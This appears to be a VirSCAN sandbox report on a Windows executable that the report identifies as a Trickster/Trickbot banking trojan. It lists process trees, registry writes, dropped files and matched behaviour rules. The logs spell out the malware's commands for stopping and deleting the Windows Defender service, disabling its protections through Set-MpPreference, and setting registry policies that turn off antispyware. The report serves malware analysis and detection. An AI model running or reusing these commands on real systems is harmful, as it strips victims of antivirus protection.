VirSCAN VirSCAN

1, You can UPLOAD any files, but there is 20Mb limit per file.
2, VirSCAN supports Rar/Zip decompression, but it must be less than 20 files.
3, Aplikace VirSCAN může skenovat komprimované soubory s heslem 'infected'nebo'virus'.
4, If your browser cannot upload files, please download VirSCAN uploader to upload.

Language
Server load
Server Load
VirSCAN
VirSCAN

1, You can UPLOAD any files, but there is 20Mb limit per file.
2, VirSCAN supports Rar/Zip decompression, but it must be less than 20 files.
3, Aplikace VirSCAN může skenovat komprimované soubory s heslem 'infected'nebo'virus'.

Basic Information

file name: 00少年三国志
file size: 1157511
file type: application/x-dosexec
MD5: 8985aede7d4774385ea89663b0c53324
sha1: 096723210c8f68f3849e3d6d822b291fa6911ffa

 CreateProcess

ApplicationName: C:\ProgramData\\xd0\x90\xd0\xb0\xd1\x85\xd0\xa5\xd0\xb5\xd0\xb5\xd0\xb0\xd0\x92\xd0\xb5\xd0\x90\xd0\x9a\xd0\xb5.exe
CmdLine: "C:\ProgramData\\xd0\x90\xd0\xb0\xd1\x85\xd0\xa5\xd0\xb5\xd0\xb5\xd0\xb0\xd0\x92\xd0\xb5\xd0\x90\xd0\x9a\xd0\xb5.exe"
childid: 3760
childname: АахХееаВеАКе.exe
childpath: C:\ProgramData\АахХееаВеАКе.exe
drop_type: 1
name: 1618626617310_8985aede7d4774385ea89663b0c53324.exe
noNeedLine: 1
path: C:\Users\Administrator\AppData\Local\Temp\1618626617310_8985aede7d4774385ea89663b0c53324.exe
pid: 3216
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c sc stop WinDefend
childid: 1348
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine: 1
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c sc delete WinDefend
childid: 2524
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine: 1
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
childid: 1676
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine:
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBehaviorMonitoring $true
childid: 828
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine:
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true
childid: 3100
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine:
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIOAVProtection $true
childid: 3204
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine:
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisablePrivacyMode $true
childid: 3932
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine:
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
childid: 3840
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine:
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -SevereThreatDefaultAction 6
childid: 3152
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine:
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -LowThreatDefaultAction 6
childid: 3372
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine:
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -ModerateThreatDefaultAction 6
childid: 1640
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine:
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableScriptScanning $true
childid: 3044
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine:
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName:
CmdLine: C:\Windows\system32\svchost.exe
childid: 252
childname: svchost.exe
childpath: C:\Windows\system32\svchost.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine: 1
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\sc.exe
CmdLine: sc stop WinDefend
childid: 3916
childname: sc.exe
childpath: C:\Windows\System32\sc.exe
drop_type:
name: cmd.exe
noNeedLine: 1
path: C:\Windows\System32\cmd.exe
pid: 1348
ApplicationName: C:\Windows\System32\sc.exe
CmdLine: sc delete WinDefend
childid: 2776
childname: sc.exe
childpath: C:\Windows\System32\sc.exe
drop_type:
name: cmd.exe
noNeedLine: 1
path: C:\Windows\System32\cmd.exe
pid: 2524
ApplicationName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CmdLine: powershell Set-MpPreference -DisableRealtimeMonitoring $true
childid: 1936
childname: powershell.exe
childpath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
drop_type:
name: cmd.exe
noNeedLine:
path: C:\Windows\System32\cmd.exe
pid: 1676
ApplicationName:
CmdLine:
childid: 3216
childname: 1618626617310_8985aede7d4774385ea89663b0c53324.exe
childpath: C:\Users\Administrator\AppData\Local\Temp\1618626617310_8985aede7d4774385ea89663b0c53324.exe
drop_type:
name:
noNeedLine:
path:
pid: 1804

 Summary

buffer: 1
processid: 3760
szSubkey: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
type: REG_DWORD
valuename: DisableAntiSpyware
buffer: 1
processid: 3760
szSubkey: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
type: REG_DWORD
valuename: DisableBehaviorMonitoring
buffer: 1
processid: 3760
szSubkey: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
type: REG_DWORD
valuename: DisableOnAccessProtection
buffer: 1
processid: 3760
szSubkey: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
type: REG_DWORD
valuename: DisableScanOnRealtimeEnable
buffer: 1
processid: 3760
szSubkey: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
type: REG_DWORD
valuename: DisableIOAVProtection
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList

 Dropped_Save

analysis_result: 安全
create: 0
how: del
md5: f0d966e1b04e76899ea834c7104e988c
name: 590aee7bdd69b59b.customDestinations-ms~RF113e361.TMP
new_size: 7960bytes
operation: 释放后删除文件
path: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF113e361.TMP
processid: 1936
processname: powershell.exe
sha1: 206beb669bb361c808a303626791b2f60b9268de
sha256: 3467a5db9e17b826bd497880d4394943c7ce97f62d030fab404d00d6841a35f9
size: 7960
this_path: /data/cuckoo/storage/analyses/1000040/files/9398384719/590aee7bdd69b59b.customDestinations-ms~RF113e361.TMP
type: data
analysis_result: 安全
create: 0
how: write
md5: 2c85a3efc5d89b9a9948336669359f97
name: a18ca4003deb042bbee7a40f15e1970b_ff1996c6-1c32-48f3-a89c-1ab09b8477c7
new_size: 1036bytes
operation: 修改文件
path: C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3531488231-4160719598-983141384-500\a18ca4003deb042bbee7a40f15e1970b_ff1996c6-1c32-48f3-a89c-1ab09b8477c7
processid: 3760
processname: АахХееаВеАКе.exe
sha1: 1b4a3b30632b210c5613858d67cf88e8d59b1566
sha256: fda8796762e7fd4e9b6021d40edea335259eb10d584fb57aaca9f402e6eea82d
size: 1036
this_path: /data/cuckoo/storage/analyses/1000040/files/1001/a18ca4003deb042bbee7a40f15e1970b_ff1996c6-1c32-48f3-a89c-1ab09b8477c7
type: data
analysis_result: 安全
create: 0
how: move
md5: 2f9b5d72a83aea079b6d78a27b80ed5e
name: 590aee7bdd69b59b.customDestinations-ms
new_size: 7960bytes
operation: 拷贝覆盖文件
path: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
processid: 1936
processname: powershell.exe
sha1: 61da7d527a81923858d7a9a83d18b522f02a1ac9
sha256: 3511c908a31d0556c1b5f861e70540ff6293aa250c47504f0134e8f6926a9c6d
size: 7960
this_path: /data/cuckoo/storage/analyses/1000040/files/1002/590aee7bdd69b59b.customDestinations-ms
type: data

 Dropped Unsave

analysis_result: Trojan-Banker.Win32.Trickster.fdz
create: 0
how: copy
md5: 8985aede7d4774385ea89663b0c53324
name: АахХееаВеАКе.exe
new_size: 1130KB (1157511bytes)
operation: 拷贝覆盖文件
path: C:\ProgramData\АахХееаВеАКе.exe
processid: 3216
processname: 1618626617310_8985aede7d4774385ea89663b0c53324.exe
sha1: 096723210c8f68f3849e3d6d822b291fa6911ffa
sha256: edbfdd8ae0eb15206692c5a6314b2ee8bb8e669a15e2916fbf666c61deb5b1e8
size: 1157511
this_path: /data/cuckoo/storage/analyses/1000040/files/1000/АахХееаВеАКе.exe
type: PE32 executable (GUI) Intel 80386, for MS Windows

 Malicious

attck_tactics: 防御逃逸
level: 2
matchedinfo: 恶意程序通过从资源段释放文件并运行的方式,以达到隐藏恶意代码的目的
num: 12
process_id: 3216
process_name: 1618626617310_8985aede7d4774385ea89663b0c53324.exe
rulename: 从资源段释放文件并运行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 一般被用于文件的加密、数据的加密传输或可能被用于勒索者病毒中
num: 25
process_id: 3216
process_name: 1618626617310_8985aede7d4774385ea89663b0c53324.exe
rulename: 调用加密算法库
attck_tactics: 防御逃逸
level: 2
matchedinfo: 恶意程序创建隐藏进程在背后偷偷运行
num: 99
process_id: 3216
process_name: 1618626617310_8985aede7d4774385ea89663b0c53324.exe
rulename: 创建隐藏子进程
attck_tactics: 防御逃逸
level: 2
matchedinfo: 恶意程序通过从资源段释放文件并运行的方式,以达到隐藏恶意代码的目的
num: 12
process_id: 3760
process_name: АахХееаВеАКе.exe
rulename: 从资源段释放文件并运行
attck_tactics: 其他恶意行为
level: 2
matchedinfo: 恶意程序通过从资源段释放资源到内存中,进行解密操作
num: 12
process_id: 3760
process_name: АахХееаВеАКе.exe
rulename: 加载资源到内存
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 一般被用于文件的加密、数据的加密传输或可能被用于勒索者病毒中
num: 25
process_id: 3760
process_name: АахХееаВеАКе.exe
